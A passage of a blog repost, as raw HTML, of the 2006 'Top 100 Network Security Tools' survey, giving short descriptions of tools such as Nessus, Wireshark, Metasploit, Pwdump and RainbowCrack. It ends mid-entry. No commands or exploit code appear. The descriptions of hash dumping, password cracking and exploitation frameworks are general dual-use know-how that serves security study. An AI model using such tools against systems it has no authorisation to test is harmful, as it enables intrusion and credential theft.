title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.openssl.org/"><img src="http://mirror.sectools.org/logos/openssl-80x24.png" align="right" border="0" width="80" height="24" /></a> <a href="http://www.openssl.org/">OpenSSL</a> : The premier SSL/TLS encryption library<br />The OpenSSL Project is a collaborative effort to develop a robust, commercial-grade, full-featured, and open source toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols as well as a full-strength general purpose cryptography library. The project is managed by a worldwide community of volunteers that use the Internet to communicate, plan, and develop the OpenSSL toolkit and its related documentation. <p>See all <a href="http://sectools.org/crypto.html">encryption tools</a> </p></td></tr></tbody></table><hr /><a name="xprobe2"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#42</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">9</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.sys-security.com/index.php?page=xprobe"><img src="http://mirror.sectools.org/logos/xprobe2-80x108.png" align="right" border="0" width="80" height="108" /></a> <a href="http://www.sys-security.com/index.php?page=xprobe">Xprobe2</a> : Active OS fingerprinting tool<br />XProbe is a tool for determining the operating system of a remote host. They do this using some of the <a href="http://insecure.org/nmap/osdetect/">same techniques</a> as <a href="http://insecure.org/nmap/">Nmap</a> as well as some of their own ideas. Xprobe has always emphasized the ICMP protocol in its fingerprinting approach. <p>See all <a href="http://sectools.org/os-detectors.html">OS detection tools</a> </p></td></tr></tbody></table><hr /><a name="etherape"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#43</span><br /><img src="http://mirror.sectools.org/flags/up_g_10x14.gif" width="10" height="14" /><span style="color:#008800;">21</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://etherape.sourceforge.net/"><img src="http://mirror.sectools.org/logos/etherape-48x48.png" align="right" border="0" width="48" height="48" /></a> <a href="http://etherape.sourceforge.net/">EtherApe</a> : EtherApe is a graphical network monitor for Unix modeled after etherman<br />Featuring link layer, IP and TCP modes, EtherApe displays network activity graphically with a color coded protocols display. Hosts and links change in size with traffic. It supports Ethernet, FDDI, Token Ring, ISDN, PPP and SLIP devices. It can filter traffic to be shown, and can read traffic from a file as well as live from the network. <p>See all <a href="http://sectools.org/sniffers.html">packet sniffers</a>, and <a href="http://sectools.org/traffic-monitors.html">traffic monitoring tools</a> </p></td></tr></tbody></table><hr /><a name="impact"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#44</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/dollarlogo_20x30.gif" alt=" TITLE=" costs="" money="" width="20" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /> </td><td valign="top"> <a href="http://www.coresecurity.com/products/coreimpact/"><img src="http://mirror.sectools.org/logos/impact-80x50.gif" align="right" border="0" width="80" height="50" /></a> <a href="http://www.coresecurity.com/products/coreimpact/">Core Impact</a> : An automated, comprehensive penetration testing product<br />Core Impact isn't cheap (be prepared to spend tens of thousands of dollars), but it is widely considered to be the most powerful exploitation tool available. It sports a large, regularly updated database of professional exploits, and can do neat tricks like exploiting one machine and then establishing an encrypted tunnel through that machine to reach and exploit other boxes. If you can't afford Impact, take a look at the cheaper <a href="http://sectools.org/tools4.html#canvas">Canvas</a> or the excellent and free <a href="http://sectools.org/index.html#metasploit">Metasploit Framework</a>. Your best bet is to use all three. <p>See all <a href="http://sectools.org/vuln-scanners.html">vulnerability scanners</a>, and <a href="http://sectools.org/sploits.html">vulnerability exploitation tools</a> </p></td></tr></tbody></table><hr /><a name="ida"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#45</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/dollarlogo_20x30.gif" alt=" TITLE=" costs="" money="" width="20" height="30" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.datarescue.com/idabase/"><img src="http://mirror.sectools.org/logos/ida-58x57.png" align="right" border="0" width="58" height="57" /></a> <a href="http://www.datarescue.com/idabase/">IDA Pro</a> : A Windows or Linux disassembler and debugger<br />Disassembly is a big part of security research. It will help you dissect that Microsoft patch to discover the silently fixed bugs they don't tell you about, or more closely examine a server binary to determine why your exploit isn't working. Many disassemblers are available, but IDA Pro has become the de-facto standard for the analysis of hostile code and vulnerability research. This interactive, programmable, extensible, multi-processor disassembler now supports Linux (console mode) as well as Windows. <p>See all <a href="http://sectools.org/disassemblers.html">disassemblers</a> </p></td></tr></tbody></table><hr /><a name="solarwinds"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#46</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">12</span><br /><img src="http://mirror.sectools.org/flags/dollarlogo_20x30.gif" alt=" TITLE=" costs="" money="" width="20" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /> </td><td valign="top"> <a href="http://www.solarwinds.net/"><img src="http://mirror.sectools.org/logos/solarwinds-80x47.png" align="right" border="0" width="80" height="47" /></a> <a href="http://www.solarwinds.net/">SolarWinds</a> : A plethora of network discovery/monitoring/attack tools<br />SolarWinds has created and sells dozens of special-purpose tools targeted at systems administrators. Security-related tools include many network discovery scanners, an SNMP brute-force cracker, router password decryption, a TCP connection reset program, one of the fastest and easiest router config download/upload applications available and more. <p>See all <a href="http://sectools.org/traffic-monitors.html">traffic monitoring tools</a>, and <a href="http://sectools.org/crackers.html">password crackers</a> </p></td></tr></tbody></table><hr /><a name="pwdump"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#47</span><br /><img src="http://mirror.sectools.org/flags/up_g_10x14.gif" width="10" height="14" /><span style="color:#008800;">6</span><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.foofus.net/fizzgig/pwdump/">Pwdump</a> : A window password recovery tool<br />Pwdump is able to extract NTLM and LanMan hashes from a Windows target, regardless of whether Syskey is enabled. It is also capable of displaying password histories if they are available. It outputs the data in L0phtcrack-compatible form, and can write to an output file. <p>See all <a href="http://sectools.org/crackers.html">password crackers</a> </p></td></tr></tbody></table><hr /><a name="lsof"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#48</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">7</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="ftp://vic.cc.purdue.edu/pub/tools/unix/lsof/">LSoF</a> : LiSt Open Files<br />This Unix-specific diagnostic and forensics tool lists information about any files that are open by processes currently running on the system. It can also list communications sockets open by each process. For a Windows equivalent, check out Process Explorer from <a href="http://sectools.org/index.html#sysinternals">Sysinternals</a>. </td></tr></tbody></table><hr /><a name="rainbowcrack"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#49</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.antsight.com/zsl/rainbowcrack/">RainbowCrack</a> : An Innovative Password Hash Cracker<br />The RainbowCrack tool is a hash cracker that makes use of a large-scale time-memory trade-off. A traditional brute force cracker tries all possible plaintexts one by one, which can be time consuming for complex passwords. RainbowCrack uses a time-memory trade-off to do all the cracking-time computation in advance and store the results in so-called "rainbow tables". It does take a long time to precompute the tables but RainbowCrack can be hundreds of times faster than a brute force cracker once the precomputation is finished. <p>See all <a href="http://sectools.org/crackers.html">password crackers</a> </p></td></tr></tbody></table><hr /><a name="firewalk"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#50</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">19</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.packetfactory.net/projects/firewalk/"><img src="http://mirror.sectools.org/logos/firewalk-80x17.png" align="right" border="0" width="80" height="17" /></a> <a href="http://www.packetfactory.net/projects/firewalk/">Firewalk</a> : Advanced traceroute<br />Firewalk employs traceroute-like techniques to analyze IP packet responses to determine gateway ACL filters and map networks. This classic tool was rewritten from scratch in October 2002. Note that much or all of this functionality can also be performed by the <a href="http://sectools.org/index.html#hping">Hping2</a> --traceroute option. <p>See all <a href="http://sectools.org/traceroutes.html">traceroute</a></p></td></tr></tbody></table>Praba.... a Hacker......http://www.blogger.com/profile/17884637785245594852noreply@blogger.com0tag:blogger.com,1999:blog-531974719972011792.post-70527147953501645362009-07-29T05:24:00.001-07:002009-07-29T05:24:43.823-07:00Top 100 Network Security Tools 1-25<p>After the tremendously successful <a href="http://sectools.org/tools2000.html">2000</a> and <a href="http://sectools.org/tools2003.html">2003</a> security tools surveys, <a href="http://www.insecure.org/">Insecure.Org</a> is delighted to release this 2006 survey. I (<a href="http://insecure.org/fyodor/">Fyodor</a>) asked users from the <a href="http://seclists.org/#nmap-hackers">nmap-hackers</a> mailing list to share their favorite tools, and 3,243 people responded. This allowed me to expand the list to 100 tools, and even subdivide them into categories. Anyone in the security field would be well advised to go over the list and investigate tools they are unfamiliar with. I discovered several powerful new tools this way. I also point newbies to this site whenever they write me saying “I don't know where to start”. </p><p>Respondents were allowed to list open source or commercial tools on any platform. Commercial tools are noted as such in the list below. No votes for the <a href="http://insecure.org/nmap/">Nmap Security Scanner</a> were counted because the survey was taken on a Nmap mailing list. This audience also biases the list slightly toward “attack” hacking tools rather than defensive ones. </p><p>Each tool is described by one ore more attributes: <table> <tbody><tr><td align="center"><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" title="New" width="28" height="11" /></td><td valign="center">Did not appear on the <a href="http://sectools.org/tools2003.html">2003 list</a></td></tr> <tr><td align="center"><img src="http://mirror.sectools.org/flags/up_g_10x14.gif" width="10" height="14" />/<img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /></td><td valign="center">Popularity ranking <img src="http://mirror.sectools.org/flags/up_g_10x14.gif" width="10" height="14" /><span style="color:#008800;">rose</span> / <img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">fell</span> the given number since the <a href="http://sectools.org/tools2003.html">2003 survey</a></td></tr> <tr><td align="center"><img src="http://mirror.sectools.org/flags/dollarlogo_20x30.gif" alt=" TITLE=" costs="" money="" width="20" height="30" /></td><td valign="center">Generally costs money. A free limited/demo/trial version may be available.</td></tr> <tr><td align="center"><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /></td><td valign="center">Works natively on Linux</td></tr> <tr><td align="center"><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /></td><td valign="center">Works natively on OpenBSD, FreeBSD, Solaris, and/or other UNIX variants</td></tr> <tr><td align="center"><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /></td><td valign="center">Works natively on Apple Mac OS X</td></tr> <tr><td align="center"><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /></td><td valign="center">Works natively on Microsoft Windows</td></tr> <tr><td align="center"><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /></td><td valign="center">Features a command-line interface</td></tr> <tr><td align="center"><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /></td><td valign="center">Offers a GUI (point and click) interface</td></tr> <tr><td align="center"><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /></td><td valign="center">Source code available for inspection.</td></tr> </tbody></table> </p><p>Please send updates and suggestions (or better tool logos) to <a href="mailto:fyodor@insecure.org">Fyodor</a>. If your tool is featured or you think your site visitors might enjoy this list, you are welcome to use our <a href="http://sectools.org/banners.html">link banners</a>. Here is the list, starting with the most popular:<br /><br /><a name="nessus"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#1</span><br /><img src="http://mirror.sectools.org/flags/dollarlogo_20x30.gif" alt=" TITLE=" costs="" money="" width="20" height="30" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /> </td><td valign="top"> <a href="http://www.nessus.org/"><img src="http://mirror.sectools.org/logos/nessus-80x77.png" align="right" border="0" width="80" height="77" /></a> <a href="http://www.nessus.org/">Nessus</a> : Premier UNIX vulnerability assessment tool<br />Nessus was a popular free and open source vulnerability scanner until they <a href="http://www.linux.com/articles/48745">closed the source code</a> in 2005 and <a href="http://sectools.org/stf/nessus_feed_letter.pdf">removed the free "registered feed" version</a> in 2008. A limited “Home Feed” is still available, though it is only licensed for home network use. Some people avoid paying by violating the “Home Feed” license, or by avoiding feeds entirely and using just the plugins included with each release. But for most users, the cost has increased from free to $1200/year. Despite this, Nessus is still the best UNIX vulnerability scanner available and among the best to run on Windows. Nessus is constantly updated, with more than 20,000 plugins. Key features include remote and local (authenticated) security checks, a client/server architecture with a GTK graphical interface, and an embedded scripting language for writing your own plugins or understanding the existing ones. <p>See all <a href="http://sectools.org/vuln-scanners.html">vulnerability scanners</a> </p></td></tr></tbody></table></p><hr /><a name="wireshark"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#2</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.wireshark.org/"><img src="http://mirror.sectools.org/logos/wireshark-80x144.png" align="right" border="0" width="80" height="144" /></a> <a href="http://www.wireshark.org/">Wireshark</a> : Sniffing the glue that holds the Internet together<br />Wireshark (known as Ethereal until a trademark dispute in Summer 2006) is a fantastic open source network protocol analyzer for Unix and Windows. It allows you to examine data from a live network or from a capture file on disk. You can interactively browse the capture data, delving down into just the level of packet detail you need. Wireshark has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session. It also supports hundreds of protocols and media types. A tcpdump-like console version named tethereal is included. One word of caution is that Ethereal has suffered from dozens of remotely exploitable security holes, so stay up-to-date and be wary of running it on untrusted or hostile networks (such as security conferences). <p>See all <a href="http://sectools.org/sniffers.html">packet sniffers</a> </p></td></tr></tbody></table><hr /><a name="snort"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#3</span><br /><img src="http://mirror.sectools.org/flags/dollarlogo_20x30.gif" alt=" TITLE=" costs="" money="" width="20" height="30" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.snort.org/"><img src="http://mirror.sectools.org/logos/snort-80x62.png" align="right" border="0" width="80" height="62" /></a> <a href="http://www.snort.org/">Snort</a> : Everyone's favorite open source IDS<br />This lightweight network intrusion detection and prevention system excels at traffic analysis and packet logging on IP networks. Through protocol analysis, content searching, and various pre-processors, Snort detects thousands of worms, vulnerability exploit attempts, port scans, and other suspicious behavior. Snort uses a flexible rule-based language to describe traffic that it should collect or pass, and a modular detection engine. Also check out the free <a href="http://secureideas.sourceforge.net/">Basic Analysis and Security Engine (BASE)</a>, a web interface for analyzing Snort alerts. <p>Open source Snort works fine for many individuals, small businesses, and departments. Parent company <a href="http://www.sourcefire.com/">SourceFire</a> offers a complimentary product line with more enterprise-level features and real-time rule updates. They offer a free (with registration) 5-day-delayed rules feed, and you can also find many great free rules at <a href="http://www.bleedingsnort.com/">Bleeding Edge Snort</a>. </p><p>See all <a href="http://sectools.org/ids.html">intrusion detection systems</a> </p></td></tr></tbody></table><hr /><a name="netcat"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#4</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.vulnwatch.org/netcat/"><img src="http://mirror.sectools.org/logos/netcat-80x155.png" align="right" border="0" width="80" height="155" /></a> <a href="http://www.vulnwatch.org/netcat/">Netcat</a> : The network Swiss army knife<br />This simple utility reads and writes data across TCP or UDP network connections. It is designed to be a reliable back-end tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need, including port binding to accept incoming connections. The original Netcat was <a href="http://seclists.org/bugtraq/1995/Oct/0028.html">released</a> by Hobbit in 1995, but it hasn't been maintained despite its immense popularity. It can sometimes even be hard to find <a href="http://download.insecure.org/stf/nc110.tgz">nc110.tgz</a>. The flexibility and usefulness of this tool have prompted people to write numerous other Netcat implementations - often with modern features not found in the original. One of the most interesting is <a href="http://sectools.org/tools3.html#socat">Socat</a>, which extends Netcat to support many other socket types, SSL encryption, SOCKS proxies, and more. It even made this list on its own merits. There is also <a href="http://sourceforge.net/projects/nmap-ncat/">Chris Gibson's Ncat</a>, which offers even more features while remaining portable and compact. Other takes on Netcat include <a href="http://www.openbsd.org/cgi-bin/cvsweb/src/usr.bin/nc/">OpenBSD's nc</a>, <a href="http://farm9.org/Cryptcat/">Cryptcat</a>, <a href="http://www.deepspace6.net/projects/netcat6.html">Netcat6</a>, <a href="http://dcs.nac.uci.edu/%7Estrombrg/pnetcat.html">PNetcat</a>, <a href="http://tigerteam.se/dl/sbd/">SBD</a>, and so-called <a href="http://netcat.sourceforge.net/">GNU Netcat</a>. <p>See all <a href="http://sectools.org/netcats.html">Netcats</a> </p></td></tr></tbody></table><hr /><a name="metasploit"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#5</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.metasploit.com/"><img src="http://mirror.sectools.org/logos/metasploit-40x69.png" align="right" border="0" width="40" height="69" /></a> <a href="http://www.metasploit.com/">Metasploit Framework</a> : Hack the Planet<br />Metasploit took the security world by storm when it was released in 2004. No other new tool even broke into the top 15 of this list, yet Metasploit comes in at #5, ahead of many well-loved tools that have been developed for more than a decade. It is an advanced open-source platform for developing, testing, and using exploit code. The extensible model through which payloads, encoders, no-op generators, and exploits can be integrated has made it possible to use the Metasploit Framework as an outlet for cutting-edge exploitation research. It ships with hundreds of exploits, as you can see in their <a href="http://metasploit.com:55555/">online exploit building demo</a>. This makes writing your own exploits easier, and it certainly beats scouring the darkest corners of the Internet for illicit shellcode of dubious quality. Similar professional exploitation tools, such as <a href="http://sectools.org/tools2.html#impact">Core Impact</a> and <a href="http://sectools.org/tools4.html#canvas">Canvas</a> already existed for wealthy users on all sides of the ethical spectrum. Metasploit simply brought this capability to the masses. <p>See all <a href="http://sectools.org/sploits.html">vulnerability exploitation tools</a> </p></td></tr></tbody></table><hr /><a name="hping"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#6</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.hping.org/"><img src="http://mirror.sectools.org/logos/hping-80x31.png" align="right" border="0" width="80" height="31" /></a> <a href="http://www.hping.org/">Hping2</a> : A network probing utility like ping on steroids<br />This handy little utility assembles and sends custom ICMP, UDP, or TCP packets and then displays any replies. It was inspired by the ping command, but offers far more control over the probes sent. It also has a handy traceroute mode and supports IP fragmentation. This tool is particularly useful when trying to traceroute/ping/probe hosts behind a firewall that blocks attempts using the standard utilities. This often allows you to map out firewall rulesets. It is also great for learning more about TCP/IP and experimenting with IP protocols. <p>See all <a href="http://sectools.org/packet-crafters.html">packet crafting tools</a> </p></td></tr></tbody></table><hr /><a name="kismet"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#7</span><br /><img src="http://mirror.sectools.org/flags/up_g_10x14.gif" width="10" height="14" /><span style="color:#008800;">10</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.kismetwireless.net/"><img src="http://mirror.sectools.org/logos/kismet-80x46.png" align="right" border="0" width="80" height="46" /></a> <a href="http://www.kismetwireless.net/">Kismet</a> : A 